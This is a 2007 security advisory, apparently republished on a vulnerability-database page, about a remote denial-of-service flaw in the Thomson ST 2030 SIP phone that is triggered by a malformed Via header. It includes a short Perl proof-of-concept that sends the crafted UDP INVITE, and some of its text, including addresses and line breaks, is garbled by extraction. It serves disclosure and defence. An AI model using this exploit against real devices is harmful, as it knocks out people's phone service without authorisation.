DOS vulnerability on Thomson SIP phone ST 2030 using the VIA Header

Risk: Medium
Local: No
Remote: Yes
CWE: CWE-noinfo

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030 Date of Discovery 15 February, 2007 Vendor was notified on 1 March 2007 ID: KIPH8 Synopsis After sending a message where the a space is replaced by a slash after the SIP version in the VIA, the device looks functional but in fact does not respond to any event provoking a DoS. Background SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP signalization. SIP is an ASCII based INVITE message is used to initiate and maintain a communication session. Affected devices: Thomson SIP phone ST 2030 Impact : A malicious user can remotely crash and perform a denial of service attack by sending one crafted SIP message. Resolution Fixed software will be available from the vendor and customers following recommended best practices (ie segregating VOIP traffic from data) will be protected from malicious traffic in most situations. Credits Humberto J. Abdelnur (Ph.D Student) Radu State (Ph.D) Olivier Festor (Ph.D) This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see, Configuration of our device: Software Version: v1.52.1 IP-Address obtained by DHCP as User name : thomson To run the exploit the file should be launched (assuming our configurations) as: perl 5060 thomson POC Code : !/usr/bin/perl #Vulnerability for Thomson 2030 firmware v1.52.1 #It provokes a DoS in the device. use IO::Socket::INET; die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]@$ARGV[0] SIP/2.0rnVia: SIP/2.0/UDP\;branch=00rnFrom: Caripe <sip:caripe@>;tag=00rnTo: <sip:$ARGV[2]@$ARGV[0]>;tag=00rnCall-ID: caripe@ 2 INVITErnrn"; $socket->send($msg); -------------- next part -------------- An HTML attachment was scrubbed... URL:

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019,


Back to Top